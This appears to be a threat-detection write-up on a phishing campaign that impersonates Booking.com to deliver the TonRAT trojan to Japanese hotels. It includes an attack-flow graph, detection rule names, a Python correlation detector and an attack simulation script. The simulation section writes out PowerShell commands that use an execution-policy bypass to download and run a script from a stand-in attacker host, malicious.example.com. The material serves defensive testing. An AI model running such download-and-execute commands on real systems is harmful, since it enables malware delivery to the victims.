Analysis of Suspicious Emails Targeting the Hotel Industry
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing campaign posing as Booking.com targeted hotel operators in Japan through infrastructure hosted on Calendly and SendGrid. The email included a shortened link that led to a ZIP archive containing a malicious LNK shortcut, which then launched a PowerShell-based loader. That loader retrieved additional PowerShell scripts, decrypted a JavaScript payload identified as TonRAT, downloaded Node.js, and executed the RAT. The malware then established command-and-control through a WebSocket endpoint obtained via the TON API.
Investigation
The report outlines the email header analysis, the abuse of legitimate delivery services, and the full multi-stage execution chain used in the attack. It provides file hashes for the ZIP archive and its internal components and lists the command-and-control domains observed during analysis. The investigation also includes technical details on the malicious LNK file and the PowerShell commands used to progress the infection.
Mitigation
Defenders should block suspicious Calendly short links, verify sender domains carefully, and restrict execution of LNK attachments delivered through email. Monitoring should also focus on unauthorized PowerShell activity and unexpected Node.js binaries appearing on endpoints. URL filtering can help block access to the known malicious domains involved in the campaign.
Response
Security teams should create detections for PowerShell commands that download content from the identified command-and-control domains and for execution of node.exe from unusual locations. Alerts should also be configured for email flows using SendGrid headers from untrusted or unexpected sources. Investigators should collect dropped files and preserve network traffic associated with the observed WebSocket communications.
Attack Flow
graph TB
  %% Class Definitions
  classDef action fill:#99ccff
  classDef tool fill:#ffcc99
  classDef malware fill:#ff9999
  classDef process fill:#cccccc
  %% Nodes
  action_phishing["<b>Action</b> – <b>T1566.002 Spearphishing Link</b><br/>Phishing email containing a malicious Calendly link is sent to the victim."]
  class action_phishing action
  action_user_click["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks the malicious Calendly link, causing the browser to download a ZIP archive."]
  class action_user_click action
  action_download_zip["<b>Action</b> – Download ZIP<br/>ZIP archive contains a shortcut (.lnk) and a dummy MP4 file."]
  class action_download_zip action
  action_open_shortcut["<b>Action</b> – <b>T1547.009 Shortcut Modification</b><br/>Victim opens the .lnk shortcut, which executes a PowerShell command."]
  class action_open_shortcut action
  tool_powershell["<b>Tool</b> – PowerShell<br/><b>Purpose</b>: Executes commands and downloads additional payloads."]
  class tool_powershell tool
  action_download_script["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>PowerShell downloads an additional script from a remote server."]
  class action_download_script action
  action_download_js["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>PowerShell also downloads an encrypted JavaScript payload."]
  class action_download_js action
  action_download_node["<b>Action</b> – Download Node.js Runtime<br/>Node.js runtime is downloaded and used to launch the next stage."]
  class action_download_node process
  malware_tonrat["<b>Malware</b> – TonRAT<br/>JavaScript-based remote access trojan executed via Node.js."]
  class malware_tonrat malware
  action_dynamic_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>TonRAT queries the TON API to resolve command-and-control domains at runtime."]
  class action_dynamic_resolution action
  action_c2["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>Establishes a WebSocket channel for C2 communications."]
  class action_c2 action
  %% Connections
  action_phishing -->|leads_to| action_user_click
  action_user_click -->|triggers| action_download_zip
  action_download_zip -->|contains| action_open_shortcut
  action_open_shortcut -->|executes| tool_powershell
  tool_powershell -->|uses| action_download_script
  tool_powershell -->|uses| action_download_js
  action_download_script -->|provides| action_download_node
  action_download_js -->|provides| action_download_node
  action_download_node -->|launches| malware_tonrat
  malware_tonrat -->|performs| action_dynamic_resolution
  action_dynamic_resolution -->|enables| action_c2
Detections
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- Possible Malicious LNK File with Double Extension (via cmdline)
- The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
- Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
- Possible Powershell Obfuscation Indicators (via powershell)
- IOCs (SourceIP) to detect: Analysis of Suspicious Emails Targeting the Hotel Industry (Part 1: Campaign Overview)
- IOCs (DestinationIP) to detect: Analysis of Suspicious Emails Targeting the Hotel Industry (Part 1: Campaign Overview)
- Detection of Phishing Emails Impersonating Booking.com via Calendly [Email]
- Detect TonRAT Deployment via PowerShell and Node.js Runtime [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Initial Access – PowerShell Download
  The attacker obtains a PowerShell remote session on the compromised host and uses Invoke-WebRequest to pull the TonRAT loader script from a malicious C2 server. This step satisfies the Invoke-WebRequest string match.
  powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri http://malicious.example.com/tonrat.ps1 -OutFile $env:TEMP\tonrat.ps1"
- Execution of the Loader
  The downloaded script is executed, which in turn spawns a second PowerShell process to run additional commands (still containing the literal “PowerShell”).
  powershell -NoProfile -ExecutionPolicy Bypass -File $env:TEMP\tonrat.ps1
- Node.js Payload Execution
  TonRAT drops a malicious JavaScript file (malicious.js) and launches it with the Node.js runtime (node.exe). This generates the node.exe string match.
  # Assume the script already placed malicious.js in C:\Temp
  & "C:\Program Files\nodejs\node.exe" C:\Temp\malicious.js
The three process creations (PowerShell with Invoke-WebRequest, PowerShell executing the loader, and node.exe) collectively satisfy the detection rule’s condition.
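As an added example that is not part of the original report or of the platform's rule, the Python below correlates the three process creations described above, and covers the detections the Response section asks for (PowerShell downloading a script, node.exe running from an unusual location), over constructed process-creation telemetry. The event field names, the match patterns and the 10-minute window are assumptions chosen to mirror the three string matches, not the rule's actual logic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation telemetry (not from the report): WS-01
# reproduces the three-stage chain, WS-02 shows benign Node.js use.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\alice\AppData\Local\Temp"
EVENTS = [
    {"host": "WS-01", "ts": "2024-01-10T09:00:01", "image": PS_IMAGE,
     "cmdline": 'powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest '
                '-Uri http://malicious.example.com/tonrat.ps1 -OutFile $env:TEMP\\tonrat.ps1"'},
    {"host": "WS-01", "ts": "2024-01-10T09:00:04", "image": PS_IMAGE,
     "cmdline": f"powershell -NoProfile -ExecutionPolicy Bypass -File {TEMP}\\tonrat.ps1"},
    {"host": "WS-01", "ts": "2024-01-10T09:00:09", "image": f"{TEMP}\\node\\node.exe",
     "cmdline": f"{TEMP}\\node\\node.exe {TEMP}\\malicious.js"},
    {"host": "WS-02", "ts": "2024-01-10T09:06:00", "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js'},
]

def is_powershell(e):
    return e["image"].lower().endswith("powershell.exe")

# One predicate per stage; the patterns are assumptions mirroring the string matches above.
STAGES = {
    # 1. PowerShell with execution-policy bypass fetching a script over HTTP
    "download": lambda e: is_powershell(e)
        and bool(re.search(r"(?i)invoke-webrequest|\biwr\b", e["cmdline"]))
        and bool(re.search(r"(?i)-ex\w*\s+bypass", e["cmdline"])),
    # 2. PowerShell executing a script file out of a user Temp directory
    "loader": lambda e: is_powershell(e)
        and bool(re.search(r"(?i)-file\s+\S*\\temp\\", e["cmdline"])),
    # 3. node.exe started from anywhere but its normal install location
    "node": lambda e: e["image"].lower().endswith("node.exe")
        and not e["image"].lower().startswith(r"c:\program files"),
}

def correlate(events, window=timedelta(minutes=10)):
    """Return {host: stages} for hosts where all three stages occur in order within `window`."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        for name, pred in STAGES.items():
            if pred(e):
                by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), name))
    hits = {}
    for host, seen in by_host.items():
        order = list(dict.fromkeys(name for _, name in seen))  # stages in first-seen order
        if order == list(STAGES) and seen[-1][0] - seen[0][0] <= window:
            hits[host] = order
    return hits
```

A host with only one or two of the stages, or with the stages spread beyond the window, is not reported, which is the trade-off the rule's "collectively satisfy" condition implies.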
Regression Test Script:
#-------------------------------------------------
# TonRAT Deployment Simulation – triggers Sigma rule
#-------------------------------------------------
$tempDir = "$env:TEMP\tonrat_demo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Download fake loader (the URL is a placeholder, so the request may fail;
#    if nothing was downloaded, a stand-in loader consisting of a simple echo is written)
$loaderUrl  = "http://malicious.example.com/tonrat.ps1"
$loaderPath = "$tempDir\tonrat.ps1"
Invoke-WebRequest -Uri $loaderUrl -OutFile $loaderPath -UseBasicParsing -ErrorAction SilentlyContinue
if (-not (Test-Path $loaderPath)) {
    Set-Content -Path $loaderPath -Value "Write-Output 'TonRAT loader simulation'"
}

# 2. Execute the loader in a second PowerShell process (the stand-in loader only echoes;
#    the dummy js file is created in step 3)
powershell -NoProfile -ExecutionPolicy Bypass -File $loaderPath

# 3. Create a dummy JavaScript payload
New-Item -ItemType Directory -Path "C:\Temp" -Force | Out-Null
$jsPath = "C:\Temp\malicious.js"
Set-Content -Path $jsPath -Value "console.log('Malicious payload executed');"

# 4. Run the payload with Node.js
$nodePath = "C:\Program Files\nodejs\node.exe"
& $nodePath $jsPath
#-------------------------------------------------
Cleanup Commands:
# Remove all artifacts created by the simulation
Remove-Item -Path "$env:TEMP\tonrat_demo" -Recurse -Force
Remove-Item -Path "C:\Temp\malicious.js" -Force
# Optionally kill any lingering PowerShell/Node processes (if needed), sparing the
# PowerShell session running this cleanup
Get-Process -Name "powershell","node" -ErrorAction SilentlyContinue |
    Where-Object { $_.Id -ne $PID } | Stop-Process -Force